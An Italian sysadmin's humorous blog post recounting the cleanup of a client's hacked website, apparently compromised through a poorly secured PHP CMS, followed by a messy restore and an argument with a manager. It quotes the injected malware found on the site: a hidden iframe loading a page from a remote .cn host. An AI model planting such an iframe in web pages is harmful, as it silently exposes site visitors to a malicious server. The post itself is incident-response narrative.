Ricerca in FOLBlog

[SdSM] Che domande

 Scritto da alle 12:39 del 29/07/2010  Aggiungi commenti
Lug 292010
 
closeQuesto articolo è stato pubblicato 7 anni 4 mesi 20 giorni giorni fa quindi alcuni contenuti o informazioni presenti in esso potrebbero non essere più validi. Questo sito non è responsabile per eventuali errori causati da questo problema.

E venne il giorno che il mio collega T se ne ri-va’ in ferie. E non e’ che decide di andarsene in campagna. Nooooo… se ne va’, nientepopodimeno che, in Canada. Per un mese (!).

Prima di andarsene in ferie mi passa un paio di mail relative all’arcifamosa applicazione di backup, adesso pare che ogni 2 x 3 l’arnese si ciucci via tutta la memoria disponibile e crashi la macchina che dovrebbe fare da server. Con il risultato che il backup non funziona piu’ per niente e basta.

Io rimango della mia idea che un bel tar.gz + scp e’ sempre la cosa migliore ma noooooo.

Comunque, mentre sono li’ che litigo con i babbuini dell’applicazione (spiegami un po’ perche’ ti serve una shell con accesso root al mio server di backup per debuggarmi il problema), mi arriva Bert tutto trafelato.

Bert – CL!
IO – CL che?
Bert – Ti ricordi del problema di CL?
IO – A quale degli ennemila problemi di CL ti riferisci?
Bert – Quello della security del loro server.
IO – Sinceramente no, non me lo ricordo.
Bert – Ma T non ti ha passato il problema?
IO – L’unica cosa che mi ha passato e’ questa roba del backup, per il resto nada. Sicuramente niente di relativo a CL ed al suo server.

Nel giro di dieci minuti Bert mi gira la mail, che altro non e’ che una mail forwardata da qualcuno che lamenta che, in uno dei millemila siti che sono ospitati sul server di CL ci sta’ un qualche tipo di malware – crapware – spyware – sarca$$o.

Lascio perdere per un attimo il backup e vado a vedere che succede sul sito di CL. E noto subito che il rapportino pare dire la verita’. In parecchi dei file di questa merdaccia trovo:


<iframe src="http://bigbestlite.cn:8080/index.php" width=179 height=102
style="visibility: hidden"></iframe>

Oh che gioia.

Naturalmente, nel giro di 5 minuti quella palla-al-piede di P arriva subito a rompere i marroni del come e del cosa. Quajo’, e dammi almeno il tempo di guardarlo sto coso no?

Comunque da quello che vedo non e’ qualcuno che ha fatto qualche cosa via ftp o SSH. Sembra proprio che il malandrino abbia usato quella meraviglia di phpapplicazione del menga di cui gia’ dissi qui e qui. Il che mi semplifica la vita perche’ posso tranquillamente dirgli di andarsi a lamentare con chi quell’arnese lo sviluppa invece di preoccuparmi io. Ma per il momento dovro’ fare un bel restore del sito precedente. Precedente all’hackeraggio intendo. Ok, acchiappa quella meraviglia (sic) di applicazione di backup e chiedi il restore dell’intero sito al giorno $giornohackeraggio[-1].

E qui’ casca l’asina: a quanto pare la password – chiave di decrittazione che sta’ scritta in corrispondenza di CL nel nostro strepitoso database di configurazione e’ sbagliata. Nel senso che il foxxuto programma di restore mi segnala errore di decrittazione per il 50% dei files e non ripristina una beata favonza.

Dopo un paio di madonne ed una lettura della documentazione di questo arnese scopro che se richiamo il malefico backup manager con un certo switch lui mi visualizza la password di crittazione. Mai la frase "ma a che ca$$o serve?" e’ stato pronunciata piu’ spesso.

Comunque, riesco a fare il restore, mi faccio una copia (un bel tar.gz) del sito ‘incriminato’, zappo via il tutto e poi ci scarico sopra la versione precedente.

E non funziona un tubo naturalmente. Perche’ devi anche fare il restore del database ovviamente. Dopo un paio di ore di ravanamento il sito sembra riprendere vita e funzionare in modo decente. Almeno "decente" se si considera la phporcata ovviamente.

Un paio d’ore dopo P ritorna a rompere i marroni.

P – Sei riuscito a capire come hanno fatto ad entrarci dentro?

IO – Entrarci?

P – Intendo sul server di CL.

IO – Nessuno e’ entrato da nessuna parte. Hanno usato quella chiavica di PhPorcata per gestire il sito.

P – E come hanno fatto? Non c’e’ una password o roba cosi’?

IO – Non lo so se c’e’ una password o no. Puo’ darsi ci sia, dovresti domandarlo a CL. Ma conoscendo CL, se una password c’e’, probabilmente e’ "password".

P – E se non e’ cosi’?

IO – Se non e’ cosi’ magari hanno usato un qualche baco di quella chiavica di coso, che tanto a posto comunque non mi sembra. In ogni caso, non sono affari nostri. Noi gestiamo il server dal punto di vista hardware ed OS, non gestiamo la schifosa applicazione.

P – Ma se il cliente ci domanda noi dobbiamo rispondere.

IO – Se vuoi la mia opinione, l’applicazione e’ una chiavica e dovrebbe essere cestinata.

P – Ma non possiamo rispondergli cosi’.

IO – Perche’ no?

P emette dei suoni volti ad indicare che non approva la mia idea ma non e’ in grado di prodursi una risposta piu’ efficace od articolata.

IO – Ed allora sarebbe opportuno che cercassero di "assicurarlo", nel senso di renderlo piu’ sicuro, non stipulare una polizza, cambiando tutte le password e magari di rivedere il codice della chiavica in modo che il foxxuto coso non debba necessariamente avere tutti i permessi del mondo per poter funzionare.

P – Magari possiamo offrire di fare un controllo di sicurezza, come quello che tu facesti sul sito di $noicuriamoivostriinteressi.

Di quella cosa ne parlai qui, qui e per finire qui.

IO – Si’. Bello. Dopo che il sito e’ stato hackato non c’e’ piu’ bisogno di domandare se il sito e’ hackabile, la risposta la sai gia’.

Per la serie "chiudere la stalla dopo che i cavalli sono stati mangiati".

Davide

legenda personaggi

Articoli simili:

  • Facebook
  • Twitter
  • Delicious
  • StumbleUpon
  • Wikio
  • Reddit
  • Technorati
  • Segnalo
  • Live
  • Add to favorites
  • Email
  • RSS

 Lascia un commento

Puoi usare questi tag e attributi HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(richiesto)

(richiesto)

Pinterest
EmailEmail
PrintPrint
%d blogger hanno fatto clic su Mi Piace per questo: